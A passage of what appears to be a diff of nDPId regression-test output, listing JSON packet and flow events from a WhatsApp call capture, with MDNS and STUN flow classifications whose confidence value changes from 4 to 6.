{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"MzMAAAD7xiwDYGpkht1gAhHGAGwR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsA5wAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZMAMAAGAAQAAAHgABMCoAgHADAAcgAEAAAB4ABD+gAAAAAAAAMQsA\/\/+YGpk"} -00707{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 
+00707{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"MzMAAAD72DBiVgAcht1gA4nLAGwR\/\/6AAAAAAAAA2jBi\/\/5WABz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsVWEAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADaMGL\/\/lYAHMAMAAGAAQAAAHgABKn+ps\/ADAAcgAEAAAB4ABD+gAAAAAAAANowYv\/+VgAc"} -00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1432582285062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582285062,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABInyUAAEARVS\/AqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACalSUAAEARuYTAqAIEHw1JMM46DZYAhue1AAMAaiESpEIAAPA16Ue1KOAmhBVAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaZm0AAEAR6DzAqAIEHw1JMM46DZYAhue1AAMAaiESpEIAAPA16Ue1KOAmhBVAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACajDIAAEARrnfAqAIEHw1dMM46DZYAhkaaAAMAaiESpEIAABQXleBLNAVxhWFAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACalgkAAEARpKDAqAIEHw1dMM46DZYAhkaaAAMAaiESpEIAABQXleBLNAVxhWFAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaRlMAAEARAcfAqAIEHw1PwM46DZYAhjlFAAMAaiESpEIAAL9\/1m08YXkuT0ZAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa1Y0AAEARcozAqAIEHw1PwM46DZYAhjlFAAMAaiESpEIAAL9\/1m08YXkuT0ZAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaIqQAAEARINbAqAIEszzAMM46DZYAhuAOAAMAaiESpEIAAHR4erx3E5L39hlAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaNRkAAEARDmHAqAIEszzAMM46DZYAhuAOAAMAaiESpEIAAHR4erx3E5L39hlAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa4C0AAEARtrvAqAIErfxyAc46DZYAhqERAAMAaiESpEIAAPckPngMfZVuqj1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaP+kAAEARVwDAqAIErfxyAc46DZYAhqERAAMAaiESpEIAAPckPngMfZVuqj1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaOAUAAEARBaXAqAIEHw1aMM46DZYAhuQ6AAMAaiESpEIAAEIAbV8qcywo32JAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaLOMAAEAREMfAqAIEHw1aMM46DZYAhuQ6AAMAaiESpEIAAEIAbV8qcywo32JAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
